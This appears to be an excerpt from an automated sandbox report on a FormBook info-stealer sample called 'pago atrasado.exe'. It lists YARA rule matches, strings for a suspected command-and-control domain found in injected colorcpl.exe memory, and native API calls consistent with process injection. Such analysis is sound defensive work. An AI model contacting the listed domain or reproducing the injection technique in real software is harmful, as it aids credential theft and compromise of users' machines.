Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://www.highvizpeople.com/__media__/design/underconstructionnotice.php?d=highvizpeople.com
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://www.highvizpeople.com/__media__/js/trademark.php?d=highvizpeople.com&type=ns
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://www.highvizpeople.com/display.cfm
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://www.highvizpeople.com/px.js?ch=1
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://www.highvizpeople.com/px.js?ch=2
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://www.highvizpeople.com/sk-logabpstatus.php?a=MzZzaVd5UDZhY0hEU3Z1UzFXVHRjNXcrTjlwaWZWbWlYbHV5Y
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp, String found in binary or memory: http://www.highvizpeople.com/song_lyrics.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2FLdrtTp
Source: unknown, DNS traffic detected: queries for: www.highvizpeople.com
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

Yara detected FormBook
          Source: Yara matchFile source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

Malicious sample detected (through community Yara rule)
          Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: pago atrasado.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 0453B150 appears 32 times
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: String function: 009CB150 appears 35 times
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_004185D0 NtCreateFile,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00418680 NtReadFile,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00418700 NtClose,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_004187B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_004185CA NtCreateFile,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041867A NtReadFile,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_004186FB NtClose,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A098F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A095D0 NtClose,LdrInitializeThunk
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A09540 NtReadFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A096E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A09660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A097A0 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A09780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A09FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A09710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A098A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A09820 NtEnumerateKey
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A0B040 NtSuspendThread
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A099D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A09950 NtQueueApcThread
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A09A80 NtOpenDirectoryObject
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A09A10 NtQuerySection
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A0A3B0 NtGetContextThread
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A09B00 NtSetValueKey
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A095F0 NtQueryInformationFile
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A09520 NtWaitForSingleObject
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A0AD30 NtSetContextThread
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A09560 NtWriteFile
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A096D0 NtCreateKey
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A09610 NtEnumerateValueKey
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A09670 NtQueryInformationProcess
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A09650 NtQueryValueKey
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A09730 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A0A710 NtOpenProcessToken
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A09760 NtOpenProcess
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A09770 NtSetInformationFile
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A0A770 NtOpenThread
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_1_004185D0 NtCreateFile
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_1_00418680 NtReadFile
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_1_00418700 NtClose
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_1_004187B0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_04579840 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_04579860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_04579540 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_04579910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_045795D0 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_045799A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_04579A50 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_04579650 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_04579660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_045796D0 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_045796E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_04579710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_04579FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_04579780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_0457B040 NtSuspendThread
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_04579820 NtEnumerateKey
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_045798F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_045798A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_04579950 NtQueueApcThread
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_04579560 NtWriteFile
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_0457AD30 NtSetContextThread
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_04579520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_045799D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_045795F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_04579670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_04579610 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_04579A10 NtQuerySection
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_04579A00 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_04579A20 NtResumeThread
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_04579A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_04579770 NtSetInformationFile
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_0457A770 NtOpenThread
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_04579760 NtOpenProcess
